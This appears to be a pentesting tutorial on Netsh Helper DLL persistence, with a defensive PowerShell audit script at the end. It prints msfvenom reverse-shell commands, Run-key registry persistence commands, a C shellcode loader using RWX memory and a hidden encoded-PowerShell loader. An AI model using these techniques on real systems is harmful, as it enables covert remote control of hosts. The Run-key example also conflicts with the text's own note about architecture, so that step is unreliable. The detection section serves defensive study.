
An arbitrary DLL file can be generated with the Metasploit Framework's "msfvenom" utility. Netsh loads a helper with LoadLibrary, so the payload in msfvenom's DLL template runs from the DLL's entry point as soon as the library is loaded, even though that DLL does not export the InitHelperDll function a real helper provides.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f dll > /tmp/pentestlab.dll

The "add helper" command of the "netsh" utility can be used to register the DLL.

add helper path-to-malicious-dll

 Netsh Helper DLL – Meterpreter

However, by default netsh is not scheduled to start automatically. Creating a registry entry that executes the utility during Windows startup establishes persistence on the host, because netsh loads every registered helper DLL each time it starts. This can be done directly from a Meterpreter session or from a Windows shell. Note that the helper DLL's architecture must match the netsh binary that loads it: on 64-bit Windows, System32\netsh is 64-bit and SysWOW64\netsh is 32-bit, so a 32-bit netsh cannot load the 64-bit DLL generated above.

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Windows\SysWOW64\netsh"
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run\\ -v pentestlab -d 'C:\Windows\SysWOW64\netsh'

Outflank, an IT security company based in the Netherlands, has released a proof-of-concept DLL in its GitHub repository. The DLL was written in C by Marc Smeets and can be modified to include custom shellcode. The Metasploit Framework utility "msfvenom" can output shellcode as source code for various languages; the "-f c" format produces a C byte array.

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp -b '\x00' -f c

 C Shellcode – Netsh

The generated shellcode can be pasted into the buffer of the Netsh Helper DLL code. The DLL allocates an RWX region inside the netsh process, copies the shellcode into it and runs it on a separate thread, so netsh itself keeps working.

#include <stdio.h>
#include <stdlib.h>  // system()
#include <windows.h>

// Shellcode from msfvenom. The buffer is truncated on this page; paste the
// full "-f c" output for the target architecture in its place.
#ifdef _M_X64
unsigned char buf[] = "\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb";
#else
#error "Paste the x86 shellcode (msfvenom -a x86) here"
#endif

// Start a separate thread so netsh remains usable while the payload runs.
DWORD WINAPI ThreadFunction(LPVOID lpParameter)
{
    LPVOID newMemory;
    HANDLE currentProcess;
    SIZE_T bytesWritten;
    BOOL didWeCopy = FALSE;
    // Get the current process handle
    currentProcess = GetCurrentProcess();
    // Allocate memory with Read+Write+Execute permissions
    newMemory = VirtualAllocEx(currentProcess, NULL, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (newMemory == NULL)
        return -1;
    // Copy the shellcode into the memory we just created
    didWeCopy = WriteProcessMemory(currentProcess, newMemory, (LPCVOID)&buf, sizeof(buf), &bytesWritten);
    if (!didWeCopy)
        return -2;
    // Run the shellcode by calling into the RWX buffer
    ((void(*)())newMemory)();
    return 1;
}

// Define the DLL handler 'InitHelperDll' as required by netsh.
// See the Microsoft documentation for InitHelperDll.
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
{
    // Create a thread for the payload and close the handle; the thread keeps running
    HANDLE threadHandle;
    threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
    if (threadHandle != NULL)
        CloseHandle(threadHandle);
    // Simple test: start the calculator
    system("start calc");

    // netsh requires NO_ERROR, which is 0; returned here the quick way
    return 0;
}

Similar to the method above, rtcrowley has released a PowerShell variant of this technique in his GitHub repository. The following code can be used to execute a PowerShell base64-encoded payload and supports two options: passing the encoded payload directly on the powershell.exe command line, or reading it from a registry value.

#include <stdio.h>
#include <stdlib.h>  // system()
#include <windows.h>

DWORD WINAPI YahSure(LPVOID lpParameter)
{
    // Option 1: Quick and simple. Opens one PowerShell process and briefly shows a window.
    // Set the payload to base64 of UTF-16LE text. The payload is not on this page;
    // replace <BASE64_PAYLOAD> with it.
    system("start C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -win hidden -nonI -nopro -enc <BASE64_PAYLOAD>");

    // Option 2: Execute base64 stored in a registry value. Spawns a few extra
    // processes but does not open an extra window.
    // system("C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c "
    //        "$x=((gp HKLM:SOFTWARE\\Microsoft\\Notepad debug).debug); "
    //        "powershell -nopro -enc $x 2> nul");
    return 1;
}

// Custom netsh helper entry point
extern "C" __declspec(dllexport) DWORD InitHelperDll(DWORD dwNetshVersion, PVOID pReserved)
{
    HANDLE hand;
    hand = CreateThread(NULL, 0, YahSure, NULL, 0, NULL);
    if (hand != NULL)
        CloseHandle(hand);

    return NO_ERROR;
}

Netsh Helper DLL – PowerShell Method

Executing the "netsh" utility and loading either DLL with the "add helper" command runs the embedded payload.

add helper C:\Users\pentestlab\Desktop\NetshHelperBeacon.dll
add helper C:\Users\pentestlab\Desktop\NetshPowerShell.dll

Empire and Metasploit's "multi/handler" module can be used to receive the connections from the two DLLs.

Netsh Helper DLL – PowerShell

Netsh Helper DLL – Meterpreter

When the "add helper" command is executed to load a DLL file, a registry entry for the helper is created, which is what makes netsh load it again on every subsequent start.


It should be noted that some VPN clients that may be installed on the compromised system launch "netsh" automatically, so a separate persistence mechanism such as the Run key above may not be required.
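The registry entries created by "add helper" and by the Run key above are also where a defender looks for this technique. The following PowerShell script is an added example, not code from the original post or from the Outflank or rtcrowley repositories. It assumes the fact that netsh keeps its helper list as values under HKLM\SOFTWARE\Microsoft\NetSh (built-in helpers appear there as bare file names loaded from System32), flags any helper whose DLL lives outside System32 or is not Microsoft-signed, and then scans the Run keys for entries that launch netsh. The function names (Get-NetshHelper, Get-SuspiciousNetshHelper, Get-NetshAutostart) and the "outside System32 or not Microsoft-signed" threshold are this example's own choices.

```powershell
# Added example (not from the original post): audit a host for the Netsh Helper DLL
# persistence described above. Run from an elevated PowerShell prompt on Windows.

$netshKey = 'HKLM:\SOFTWARE\Microsoft\NetSh'   # where netsh stores registered helpers
$runKeys  = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)

function Resolve-HelperPath {
    param([string]$Data)
    # Built-in helpers are stored as a bare file name (e.g. "ifmon.dll") and are
    # loaded from System32; "add helper" stores the path the operator supplied.
    if ([System.IO.Path]::IsPathRooted($Data)) { return $Data }
    return (Join-Path $env:SystemRoot "System32\$Data")
}

function Get-NetshHelper {
    # One object per registered helper, with the resolved DLL path and signature status.
    $item = Get-Item -Path $netshKey -ErrorAction Stop
    foreach ($name in $item.GetValueNames()) {
        $data = [string]$item.GetValue($name)
        if (-not $data) { $data = $name }        # fall back to the value name if data is empty
        $path = Resolve-HelperPath $data
        $sig  = if (Test-Path -LiteralPath $path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        [pscustomobject]@{
            Name       = $name
            Data       = $data
            Path       = $path
            Exists     = [bool]$sig
            Signer     = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '' }
            SigStatus  = if ($sig) { [string]$sig.Status } else { 'Missing' }
            InSystem32 = ($path -like "$env:SystemRoot\System32\*")
        }
    }
}

function Get-SuspiciousNetshHelper {
    # Flag anything outside System32, missing, unsigned, or not signed by Microsoft.
    # Threshold chosen for this example; a third-party helper (e.g. from a VPN client)
    # will also trip it, so verify before removing anything.
    Get-NetshHelper | Where-Object {
        -not $_.InSystem32 -or $_.SigStatus -ne 'Valid' -or $_.Signer -notmatch 'Microsoft'
    }
}

function Get-NetshAutostart {
    # Run-key values whose command launches netsh, like the "Pentestlab" entry above.
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item -Path $key
        foreach ($name in $item.GetValueNames()) {
            $cmd = [string]$item.GetValue($name)
            if ($cmd -match '(?i)(^|[\\\s"])netsh(\.exe)?(\s|"|$)') {
                [pscustomobject]@{ Key = $key; Name = $name; Command = $cmd }
            }
        }
    }
}

'== Suspicious netsh helpers =='
Get-SuspiciousNetshHelper | Format-Table Name, Path, SigStatus, Signer -AutoSize
'== Run-key entries that launch netsh =='
Get-NetshAutostart | Format-Table -AutoSize
```

A helper added with the commands above shows up with a path under the user's profile and SigStatus NotSigned, and the Run entry shows up with Command C:\Windows\SysWOW64\netsh. Because netsh loads every registered helper each time it starts, removing the malicious value from the NetSh key (or running netsh "delete helper") is what actually stops the payload; deleting only the Run entry leaves the DLL loadable by any other netsh invocation, including the VPN-client case noted above.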
